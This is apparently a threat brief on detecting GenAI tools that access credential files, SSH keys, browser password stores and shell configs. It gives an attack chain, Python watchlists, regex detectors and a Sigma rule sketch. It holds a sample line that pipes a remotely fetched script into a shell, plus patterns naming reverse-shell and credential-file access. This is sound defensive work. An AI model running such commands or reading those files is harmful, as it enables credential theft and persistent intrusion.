GenAI Tools Accessing Sensitive Files for Credential Access and Persistence
This threat brief details the detection of GenAI tools accessing sensitive files containing credentials, SSH keys, browser data, and shell configurations, indicating potential credential harvesting and persistence attempts by attackers leveraging GenAI agents.
Attackers are increasingly leveraging GenAI agents to automate the discovery and exfiltration of sensitive information, including credentials, API keys, and tokens stored within files on compromised systems. The observed activity involves GenAI tools accessing critical files such as cloud credentials, SSH keys, browser password databases, and shell configuration files. Successful exploitation allows attackers to harvest credentials, gain unauthorized access to systems, and establish persistence mechanisms for continued access. The GenAI tools mentioned include ollama, textgen, lmstudio, claude, cursor, copilot, codex, jan, gpt4all, gemini-cli, genaiscript, grok, qwen, koboldcpp, llama-server, windsurf, zed, opencode, and goose. This activity highlights the emerging threat landscape of AI-assisted attacks and the need for robust detection and mitigation strategies.
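The process and file names called out above can be expressed as simple watchlists. The sketch below is an illustrative Python matcher; the names and path patterns are taken from this brief and are not an exhaustive or production-ready list:

```python
import fnmatch

# Watchlists assembled from the tool and file names in this brief;
# real deployments should tune these to their environment.
GENAI_PROCESSES = {
    "ollama", "textgen", "lmstudio", "claude", "cursor", "copilot", "codex",
    "jan", "gpt4all", "gemini-cli", "genaiscript", "grok", "qwen",
    "koboldcpp", "llama-server", "windsurf", "zed", "opencode", "goose",
}

SENSITIVE_PATH_PATTERNS = [
    "*/.aws/credentials",
    "*/.ssh/id_*",
    "*/Login Data",   # Chromium-family browser password database
    "*/key3.db",      # legacy Firefox key store
    "*/.bashrc",
    "*/.zshrc",
]

def is_suspicious(process_name: str, file_path: str) -> bool:
    """Flag a file-access event when a known GenAI process touches a sensitive path."""
    if process_name not in GENAI_PROCESSES:
        return False
    return any(fnmatch.fnmatch(file_path, pat) for pat in SENSITIVE_PATH_PATTERNS)

print(is_suspicious("ollama", "/home/dev/.aws/credentials"))  # True
print(is_suspicious("vim", "/home/dev/.aws/credentials"))     # False
```

Matching on process name alone will miss renamed binaries; pairing it with binary hashes or signed-image checks is more robust.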
Attack Chain
- Initial compromise of a system through an unrelated vulnerability or social engineering.
- Installation or execution of a GenAI tool (e.g., ollama, lmstudio) on the compromised system.
- The GenAI tool is configured or instructed to scan the file system for sensitive files.
- The GenAI tool accesses files containing credentials, such as .aws/credentials, browser password databases (Login Data, key3.db), or SSH keys (.ssh/id_*).
- The GenAI tool exfiltrates the harvested credentials and API keys to a remote server controlled by the attacker.
- The attacker uses the stolen credentials to gain unauthorized access to cloud resources, internal systems, or other sensitive accounts.
- The GenAI tool attempts to modify shell configuration files (e.g., .bashrc, .zshrc) to establish persistence.
- Upon system restart or user login, the modified shell configuration executes malicious commands, granting the attacker persistent access.
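The persistence step in the chain above typically appends attacker-controlled commands to a shell configuration file. A minimal sketch of a scanner for such appended lines follows; the indicator patterns are hypothetical examples for illustration, not a complete detection set:

```python
import re

# Illustrative indicator patterns only; real persistence commands vary widely.
SUSPICIOUS_PATTERNS = [
    re.compile(r"curl\s+[^|]*\|\s*(ba)?sh"),  # remote script piped into a shell
    re.compile(r"base64\s+(-d|--decode)"),     # obfuscated payload decoding
    re.compile(r"nc\s+-e"),                    # classic reverse-shell flag
]

def flag_persistence_lines(shell_config_text: str) -> list[str]:
    """Return lines of a shell config (.bashrc/.zshrc) matching the indicators."""
    hits = []
    for line in shell_config_text.splitlines():
        if any(p.search(line) for p in SUSPICIOUS_PATTERNS):
            hits.append(line.strip())
    return hits

sample = "alias ll='ls -la'\ncurl http://198.51.100.7/x.sh | sh\n"
print(flag_persistence_lines(sample))  # ["curl http://198.51.100.7/x.sh | sh"]
```

Pattern matching on config contents is noisy on its own; correlating the write event with the writing process (as the detections below do) gives higher-fidelity alerts.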
Impact
Successful exploitation of this threat can lead to significant data breaches, unauthorized access to critical systems, and persistent compromise of affected environments. Attackers can leverage stolen credentials to escalate privileges, move laterally within the network, and exfiltrate sensitive data. The number of victims and the sectors targeted are currently unknown, but the potential impact is broad given the increasing adoption of GenAI tools across industries. Credential theft can result in financial loss, intellectual property theft, and reputational damage.
Recommendation
- Deploy the Sigma rule “GenAI Process Accessing Sensitive Files” to your SIEM to detect GenAI tools accessing sensitive files on endpoints.
- Enable file access monitoring on systems where GenAI tools are used to capture access events for analysis.
- Review and restrict the use of GenAI tools within the environment, especially concerning access to sensitive file paths.
- Monitor for modifications to shell configuration files (e.g., .bashrc, .zshrc, .profile) as an indicator of persistence attempts.
- Implement regular credential rotation policies to minimize the impact of stolen credentials.
Detection coverage (2 rules)
GenAI Process Accessing Sensitive Files
Severity: high. Detects GenAI tools accessing sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations.
GenAI Process Modifying Shell Configuration Files
Severity: medium. Detects GenAI tools writing to shell configuration files, which can indicate persistence attempts.
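Detection logic of this shape is commonly written as a Sigma rule over file-access events. The sketch below is an illustrative simplification, not the platform's actual rule; the field names assume a Linux file_event log source, and the value lists are abbreviated:

```yaml
title: GenAI Process Accessing Sensitive Files (illustrative sketch)
status: experimental
logsource:
  category: file_event
  product: linux
detection:
  selection_tool:
    Image|endswith:
      - '/ollama'
      - '/lmstudio'
      - '/claude'
  selection_target:
    TargetFilename|contains:
      - '/.aws/credentials'
      - '/.ssh/id_'
      - '/Login Data'
  condition: selection_tool and selection_target
level: high
```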
Detection queries are maintained inside the platform.